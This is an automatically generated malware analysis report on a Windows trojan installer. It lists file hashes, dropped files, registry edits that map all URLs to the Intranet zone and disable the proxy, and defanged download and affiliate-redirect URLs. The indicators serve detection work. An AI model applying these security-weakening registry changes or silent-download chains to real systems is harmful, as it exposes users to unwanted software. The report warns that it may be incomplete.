Trojan.Generic.11944172_e024fb5336

by malwarelabrobot on May 14th, 2016 in Malware Descriptions.

Trojan.Generic.11944172 (B) (Emsisoft), Trojan.Generic.11944172 (AdAware), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


This description has been generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: e024fb5336b77feb46b897cdcbb42bd4
SHA1: d53351936b8377c6a25856bad6329c73cfec4a0b
SHA256: 9eae7c704523ce71991724704bc029f49e82de8be7ba1fd43de72eadfe5aa7c4
SSDeep: 98304:BsPrm85pf4S709dSoEG7EC4T5d8tbB75RKg6EhZRu HYC:b8xcSoEgECO05zTaC
Size: 5122042 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1764
cpSetup.exe:260

The Trojan injects its code into the following process(es):

Setup__2140_il65.exe:1408

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\cpSetup.exe (31319 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (630 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe (66356 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\cpSetup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)

The process cpSetup.exe:260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\000ce9aa.a (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000cf0ce.a (1709 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\000ce9aa.a (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000cf0ce.a (0 bytes)

The process Setup__2140_il65.exe:1408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\finish[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (7648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\decline[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cancel[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dm_left_image[1].png (3108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\skip[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\logo[1].png (3036 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\amipb[1].js (31329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Desktop\Continue installation .lnk (848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\accept[1].gif (3 bytes)

Registry activity

The process %original file name%.exe:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 34 9F 92 08 48 FF C4 82 27 05 E5 98 EB 9F 91"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process cpSetup.exe:260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 32 2B D7 B6 4F 61 2A 0B C8 33 1C 3E 03 10 E3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE security zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

"IntranetName" = "1"

The process Setup__2140_il65.exe:1408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\TypeLib]
"(Default)" = "{b5becdeb-e2ba-4f85-ae0b-37cb4d093da2}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\Version]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0]
"(Default)" = "InstallerLib"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Setup__2140_il65\DEBUG]
"Trace Level" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il65.exe"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\VersionIndependentProgID]
"(Default)" = "carpel.groveled"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1463087278"

[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 18 1C 0C 4E A3 CF 5E 83 A6 05 CB 07 C9 14 AC"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKCR\carpel.groveled.1\CLSID]
"(Default)" = "{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"

[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\carpel.groveled\CurVer]
"(Default)" = "carpel.groveled.1"

[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\TypeLib]
"(Default)" = "{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}"

[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}]
"(Default)" = "IBoot"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\ProgID]
"(Default)" = "carpel.groveled.1"

[HKCR\carpel.groveled]
"(Default)" = "Inst Class"

[HKCR\carpel.groveled.1]
"(Default)" = "Inst Class"

The Trojan modifies IE security zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Setup__2140_il65\DEBUG]
"Trace Level"

Dropped PE files

MD5 File path
fae6dcd512e610217f19251ab65624fd c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Setup__2140_il65.exe
a5f8399a743ab7f9c88c645c35b1ebb5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh2.tmp\NSISdl.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 57344 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 249856 2536 2560 3.13928 7e17f704d3bfebc09c619c31ae04b106

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 76
1f80adc186d38569a7f12b37bfb110ae
d75f64a4fc6e1e630f3a51c92ad3c93f
879651a405ee0a51e41803ce9bcb4634
7cbf36c08b44adbda84a760fcb3d5bd5
95259d62d096d69e6c71124d76d2742e
4251897fc31de2b714ccd3c165ed3c22
b958be3153aacfa25cceea183ef7dd3e
891f61a5480eeb26ce51a0fd77355991
6ebad71edda218ef8102afe3432bc334
0ad1ef2f250441d9ae9594b8793c569f
faa24adbd70ff86f783e1419d2115763
723ccdfe9da6d78a751fe606dea351aa
93711c4ab5b6416877a200c6f1a26f70
8eef73e34ed320b0a121902ac1d3ab50
21b13c0e699f2e1a2fc63088e1de4dc1
28cb970d9a603307bbfce338e45bd285
3392bcf5c59acc67d5817989b6ac74bd
4f67278caf52bca6a599c78fd5751400
feb6e129679225efba86b059cca01931
8b6484933de890c4d13e0ffa534de649
defe46a11799c224eb650f9e362aea5d
4270445c87bd8d346291d62413ed0740
5a2b6322d2b8d9a7df6bb0a489d5dae9
2634dc3da87a016d964fbdf1f33bd999
e6333d8fd797d71aae7b43f8c5206cda

URLs

URL IP
hxxp://46.21.100.248/launch_v2.php?p=sevenzip&pid=145&tid=438526&sid=7
hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11
hxxp://up.freeo9.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 52.85.173.161
hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 52.16.169.88
hxxp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 52.85.173.161
hxxp://up.freeo9.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 52.85.173.161
hxxp://set.downor3.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.88.21.193
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css
hxxp://dyno3mlj15jgv.cloudfront.net/V35/amipb.js
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/finalize.php
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/Html/7d0e2798-c9e5-442a-a48d-1a3dfc747868/logo.png
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png
hxxp://www.secularistsarakolet.site/index.php 54.83.41.157
hxxp://www.secularistsarakolet.site/finalize.php 54.83.41.157
hxxp://up.freeo9.spacehxxp://up.freeo9.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 52.85.173.161
hxxp://www.secularistsarakolet.site/Html/7d0e2798-c9e5-442a-a48d-1a3dfc747868/logo.png 54.83.41.157
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png 54.83.41.157
hxxp://cdn1.downloadcrest.com/V35/amipb.js 52.85.173.7
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css 52.85.173.111
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif 52.85.173.111
hxxp://set.downor3.spacehxxp://set.downor3.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.88.21.193
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif 52.85.173.111
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png 52.85.173.111
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png 52.85.173.111
hxxp://get.wenter3.space/?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11 52.85.173.149
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif 52.85.173.111
hxxp://capital.go2cloud.orghxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 52.16.169.88
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif 52.85.173.111
hxxp://up.freeo9.spacehxxp://up.freeo9.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 52.85.173.161
hxxp://up.freeo9.spacehxxp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 52.85.173.161
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif 52.85.173.111
